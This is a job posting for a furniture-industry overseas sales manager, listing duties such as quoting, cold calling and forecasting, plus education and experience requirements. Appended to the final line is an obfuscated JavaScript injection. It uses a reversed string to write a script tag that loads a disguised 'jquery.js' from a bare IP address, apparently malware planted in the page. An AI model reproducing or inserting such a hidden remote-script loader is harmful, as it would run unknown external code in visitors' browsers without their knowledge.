Industry : Furniture
– Be responsible for overseas communication and on-going sales activity.
– Prepare quotes & keep quotes up to date.
– Keep all members of the sales force and management updated at all times.
– Write meeting notes.
– Prepare individual processes for operating each account and ensure all members of the company understand and follow.
– Ensure we are up to date on all standards / country and customer requirements.
– Ensure all other departments act and deliver on time and commit to deliverable dates.
– Monitor individual customer delivery performance and satisfaction levels.
– Visit the work area overseas regularly.
– Prepare itineraries; flight schedules; hotels.
– Evaluate sales history and forecast sales for the future.
– Evaluate a products performance within a customer.
– Evaluate a customer’s retail profile and recommend product opportunities.
– Cold call new customers and introduce the company.
– Represent and present company alongside the director.
– Sell company product as required.
– Assist with show organization and set-up.
– Support all aspects of the directors requirements.
– Work with sales administration to deliver an outstanding service.
– Candidate must possess at least a Diploma or Degree in Business Studies/ Administration/ Management, Marketing or equivalent.
– At least 10 years of working experience in the related field is required for this position.
– Good command of the English language
– Applicants must be willing to work in Telok Gong, Pelabuhan Klang (HQ) with frequent visits overseas to manage the business
– Preferably Managers specializing in Sales – Corporate or equivalent.
– Those from furniture industry preferred document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))